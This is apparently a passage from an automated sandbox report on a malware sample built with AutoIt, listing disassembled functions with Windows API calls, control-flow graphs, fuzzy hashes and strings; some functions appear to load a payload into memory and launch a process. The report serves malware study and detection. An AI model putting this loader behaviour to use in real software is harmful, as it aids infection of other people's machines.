                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3936961a086d63eb67fc8db637a498f819c23d08819a495b7055a36232204d4
                • Instruction ID: ddec35c6caae330a909bf7f6078677d65d79d6370b2e166aa71674c35b1cf618
                • Opcode Fuzzy Hash: a3936961a086d63eb67fc8db637a498f819c23d08819a495b7055a36232204d4
                • Instruction Fuzzy Hash: 74C1C174E04249AFDF11DFE8D841BAEBBB4AF19310F144199F915AB3A2C7709982CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A80920 Relevance: 10.7, APIs: 7, Instructions: 185fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 607 1a80920-1a80972 call 1a80820 CreateFileW 610 1a8097b-1a80988 607->610 611 1a80974-1a80976 607->611 614 1a8098a-1a80996 610->614 615 1a8099b-1a809b5 VirtualAlloc 610->615 612 1a80b36-1a80b3a 611->612 614->612 616 1a809be-1a809e4 CreateFileW 615->616 617 1a809b7-1a809b9 615->617 619 1a80a08-1a80a22 ReadFile 616->619 620 1a809e6-1a80a03 616->620 617->612 621 1a80a24-1a80a41 619->621 622 1a80a46-1a80a4a 619->622 620->612 621->612 623 1a80a4c-1a80a69 622->623 624 1a80a6e-1a80a74 622->624 623->612 626 1a80a7f-1a80aa2 624->626 629 1a80aa4 626->629 630 1a80ac7-1a80ae1 WriteFile 626->630 635 1a80aae-1a80ac5 629->635 636 1a80aa6-1a80aac 629->636 632 1a80b0c-1a80b31 FindCloseChangeNotification VirtualFree 630->632 633 1a80ae3-1a80b0a 630->633 632->612 633->612 635->626 636->630 636->635
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01A80965
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                • Instruction ID: 26682879fb1eeee660af7fc2663206f5e6eda03a417fb5751b5a3ef66426609e
                • Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
                • Instruction Fuzzy Hash: 5E71FD75A10208EBDF24DFA4CD89FEEBBB5BF48700F148558F605EB280DA749A44CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00112C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 654 112c63-112cd3 CreateWindowExW * 2 ShowWindow * 2
                APIs
                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00112C91
                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00112CB2
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00111CAD,?), ref: 00112CC6
                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00111CAD,?), ref: 00112CCF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: d578ad16c12d07c79b0339c409c3a54ac4692404b3bd2f608923e5f6c7e1d190
                • Instruction ID: 24c6c5d5ef01cd21cd2bf075b100f2b1910506961205f24db6e7201fd2d30264
                • Opcode Fuzzy Hash: d578ad16c12d07c79b0339c409c3a54ac4692404b3bd2f608923e5f6c7e1d190
                • Instruction Fuzzy Hash: 93F0DA755402D07AEB311797AC88E7B7EBDE7C7F60F00005AF900AA9A0C67118D1DAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00182947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00182C05
                • DeleteFileW.KERNEL32(?), ref: 00182C87
                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00182C9D
                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00182CAE
                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00182CC0
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$Delete$Copy
                • String ID:
                • API String ID: 3226157194-0
                • Opcode ID: 5584ae2a2e97aec9a6cf383ae79edeaa6d0cb74ef566035962c01c1c46a327fb
                • Instruction ID: c7a1905a3900b20c0f312a31379bf22a6aba784fa77e129e0c5bde08594ce960
                • Opcode Fuzzy Hash: 5584ae2a2e97aec9a6cf383ae79edeaa6d0cb74ef566035962c01c1c46a327fb
                • Instruction Fuzzy Hash: 21B15D71901119ABDF26EBA4CC85EEEBBBDEF59310F1040A6F509E7141EB319B448FA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A82440 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 875 1a82440-1a82555 call 1a80000 call 1a82330 CreateFileW 882 1a8255c-1a8256c 875->882 883 1a82557 875->883 886 1a8256e 882->886 887 1a82573-1a8258d VirtualAlloc 882->887 884 1a82629-1a8262e 883->884 886->884 888 1a8258f 887->888 889 1a82594-1a825ab ReadFile 887->889 888->884 890 1a825ad 889->890 891 1a825af-1a825c4 call 1a810d0 889->891 890->884 893 1a825c9-1a82603 call 1a82370 call 1a81330 891->893 898 1a8261f-1a82627 893->898 899 1a82605-1a8261a call 1a823c0 893->899 898->884 899->898
                APIs
                  • Part of subcall function 01A82330: Sleep.KERNELBASE(000001F4), ref: 01A82341
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A8254B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: CreateFileSleep
                • String ID: J4XZWXL54J4661J
                • API String ID: 2694422964-1089018925
                • Opcode ID: 6f2a21149c649fb9989fcdc149a11f9c503cf28596870597020a0efb808fa96e
                • Instruction ID: 818dd7e3d7968e77d094144476c14b1019981f72ad6c6b431bb82ce4373adf8f
                • Opcode Fuzzy Hash: 6f2a21149c649fb9989fcdc149a11f9c503cf28596870597020a0efb808fa96e
                • Instruction Fuzzy Hash: 9D517231D14249DBEF15EBA4C914BEEBBB8EF49300F1041A9E6097B2C0D7791B45CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00113B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 938 113b1c-113b27 939 113b99-113b9b 938->939 940 113b29-113b2e 938->940 942 113b8c-113b8f 939->942 940->939 941 113b30-113b48 RegOpenKeyExW 940->941 941->939 943 113b4a-113b69 RegQueryValueExW 941->943 944 113b80-113b8b RegCloseKey 943->944 945 113b6b-113b76 943->945 944->942 946 113b90-113b97 945->946 947 113b78-113b7a 945->947 948 113b7e 946->948 947->948 948->944
                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00113B0F,SwapMouseButtons,00000004,?), ref: 00113B40
                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00113B0F,SwapMouseButtons,00000004,?), ref: 00113B61
                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00113B0F,SwapMouseButtons,00000004,?), ref: 00113B83
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 3677997916-824357125
                • Opcode ID: 12a9da0f28b469c9048fbbf244c319f73947643cb294e9f97fa5bd5c08ecf616
                • Instruction ID: 642452d541df93933241fa3e3a3c777e3b3f8a869c525235294a87971da3bbd2
                • Opcode Fuzzy Hash: 12a9da0f28b469c9048fbbf244c319f73947643cb294e9f97fa5bd5c08ecf616
                • Instruction Fuzzy Hash: 8A1127B5614208FFDB258FA5DC84AEFBBB8EF45744B10846AB815D7114E3319E809BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                Download Yara Rule
                Strings
                • Variable must be of type 'Object'., xrefs: 001632B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: Variable must be of type 'Object'.
                • API String ID: 0-109567571
                • Opcode ID: 04b1c39aac4e5c0e457c901bb27148c09757aa1abbfd9ed3d49925c680174b21
                • Instruction ID: 8d799a391d544ea051383fdc9fba83ee0b03235f2b3f8b648037ebdc9ffc5a6b
                • Opcode Fuzzy Hash: 04b1c39aac4e5c0e457c901bb27148c09757aa1abbfd9ed3d49925c680174b21
                • Instruction Fuzzy Hash: 8DC27975A00214CFCB28CF98D890AEDB7F1BF19310F258169ED16AB291D375ED92CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00130668
                  • Part of subcall function 001332A4: RaiseException.KERNEL32(?,?,?,0013068A,?,001E1444,?,?,?,?,?,?,0013068A,00111129,001D8738,00111129), ref: 00133304
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00130685
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Exception@8Throw$ExceptionRaise
                • String ID: Unknown exception
                • API String ID: 3476068407-410509341
                • Opcode ID: 212b25279b9d73656f252256dd62131e8a8e9b1bd01c22c8fde54e5ce140e990
                • Instruction ID: 583fae43c9bb4c54a236b02fb0690aa3be944aa841cbaa03c03fa01344361655
                • Opcode Fuzzy Hash: 212b25279b9d73656f252256dd62131e8a8e9b1bd01c22c8fde54e5ce140e990
                • Instruction Fuzzy Hash: 76F0CD3490020DB7CB05BAE8E856C9E7BBC9E14310F604535B824D65D6EF71EA6ACA80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A81060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 01A810A5
                • ExitProcess.KERNEL32(00000000), ref: 01A810C4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: Process$CreateExit
                • String ID: D
                • API String ID: 126409537-2746444292
                • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                • Instruction ID: 9a50cc59070c97344134a09de17223aab4e8da57de969db600527c8508507caf
                • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                • Instruction Fuzzy Hash: F2F0FF71A4028CABDB60EFE0CD49FFE77BCBF04705F448519FB0A9A180DA7496098B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00183017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                Download Yara Rule
                APIs
                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0018302F
                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00183044
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Temp$FileNamePath
                • String ID: aut
                • API String ID: 3285503233-3010740371
                • Opcode ID: 6d834d2f2708f6729afddaa8d82da4fee68cbe5efe92e0a1d6c39e8ef9c18c82
                • Instruction ID: 8abd9338460636058e1c1d456d39a6028c0da7dc17de48d3d6044e3c0e267093
                • Opcode Fuzzy Hash: 6d834d2f2708f6729afddaa8d82da4fee68cbe5efe92e0a1d6c39e8ef9c18c82
                • Instruction Fuzzy Hash: D0D05E7250032867DA20A7A4AD0EFCB7B7CDB05750F0002A3B696E2092DBB49984CAD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00197F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001982F5
                • TerminateProcess.KERNEL32(00000000), ref: 001982FC
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 001984DD
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CurrentFreeLibraryTerminate
                • String ID:
                • API String ID: 146820519-0
                • Opcode ID: 6c5487b4b50e2953ea4b5153ef49ff1ce9acb554d763a16f330f247580125cd2
                • Instruction ID: 5f837dabe52a3d44eb09969feb1eabb592e914aa134250bfdfa7cf7f906379bd
                • Opcode Fuzzy Hash: 6c5487b4b50e2953ea4b5153ef49ff1ce9acb554d763a16f330f247580125cd2
                • Instruction Fuzzy Hash: CF126C71A083419FCB14DF28C484B6ABBE5BF95314F04895DF8998B292DB31ED46CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00145AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed3f47280829b7ab5b498e9b0ec9742b0c0d3aaa7ce593f4d97fbbd0972753ee
                • Instruction ID: 535d750d65c988ac985dabb2e1c2b9b4f6d766b3f4dbe88651cc51518b6f7631
                • Opcode Fuzzy Hash: ed3f47280829b7ab5b498e9b0ec9742b0c0d3aaa7ce593f4d97fbbd0972753ee
                • Instruction Fuzzy Hash: 6651BF71D00609AFCF259FA4C885FAEBBBAEF15320F150059F405AB2A3D7719A42CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00111BF4
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00111BFC
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00111C07
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00111C12
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00111C1A
                  • Part of subcall function 00111BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00111C22
                  • Part of subcall function 00111B4A: RegisterWindowMessageW.USER32(00000004,?,001112C4), ref: 00111BA2
                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0011136A
                • OleInitialize.OLE32 ref: 00111388
                • CloseHandle.KERNEL32(00000000,00000000), ref: 001524AB
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                • String ID:
                • API String ID: 1986988660-0
                • Opcode ID: 67562d0c693c90a41bddf32a7c35db908f280c95433ab44fbdb670e16399a42d
                • Instruction ID: 091b0afbc60dec2d1654a3ce14a4320ef3cfe75cfc21ceac13f6bc8bd1265a6f
                • Opcode Fuzzy Hash: 67562d0c693c90a41bddf32a7c35db908f280c95433ab44fbdb670e16399a42d
                • Instruction Fuzzy Hash: 967191B59013C4BEC788DFB9A985A9D7AE1FF9A344394812AD40ADFB61E77044C1CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001154C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0011556D
                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0011557D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: bb9caf568317ce33d8ca824b40040767cbe91e04caa8e473ebf8d58d7786ed93
                • Instruction ID: 85f01a43a7a338ed0fe84ed1c5af4226d99fb763c54ec64664c0a3c47ea02723
                • Opcode Fuzzy Hash: bb9caf568317ce33d8ca824b40040767cbe91e04caa8e473ebf8d58d7786ed93
                • Instruction Fuzzy Hash: 43314D71A00619EFDB18CF28C880BD9B7B7FB88354F14862AE91597240D771FE94CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001485CC,?,001D8CC8,0000000C), ref: 00148704
                • GetLastError.KERNEL32(?,001485CC,?,001D8CC8,0000000C), ref: 0014870E
                • __dosmaperr.LIBCMT ref: 00148739
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                • String ID:
                • API String ID: 490808831-0
                • Opcode ID: d6f923436baf32c7750ca444f63259813323fc5441fb7e2f7aa2615e15223ed5
                • Instruction ID: 0864b616b8f4fbcf6fcec5a40d3bff5ab6237f60c7499084e94aaf9618be6fcb
                • Opcode Fuzzy Hash: d6f923436baf32c7750ca444f63259813323fc5441fb7e2f7aa2615e15223ed5
                • Instruction Fuzzy Hash: AB014933A0566027D7A56734A885B7E674A5B92B78F3A0119F8188B1F3DFA0CCC28190
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00182FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00182CD4,?,?,?,00000004,00000001), ref: 00182FF2
                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00182CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00183006
                • CloseHandle.KERNEL32(00000000,?,00182CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0018300D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$CloseCreateHandleTime
                • String ID:
                • API String ID: 3397143404-0
                • Opcode ID: f504504e0d9fec6824902e5857e3889639950d455ddd6b830f7f45532c436441
                • Instruction ID: 7843cccbafb9f28675da8a1c1cd23f760d4c749ecfcc026ef2988ce15d7a4240
                • Opcode Fuzzy Hash: f504504e0d9fec6824902e5857e3889639950d455ddd6b830f7f45532c436441
                • Instruction Fuzzy Hash: FDE0863238021077D6312755BC0DF8B3A1CDB87F71F104210F729750D08AA0564147E8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00121310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                Download Yara Rule
                APIs
                • __Init_thread_footer.LIBCMT ref: 001217F6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Init_thread_footer
                • String ID: CALL
                • API String ID: 1385522511-4196123274
                • Opcode ID: 42b822d1bb98353b1dbf35bf5ec2d9004d0f941ac902fa034fde39f65cc01033
                • Instruction ID: aa99de9201513d9e44fe9437b32ca47b58eaad87b7b6a7be7701c9d883eadbe2
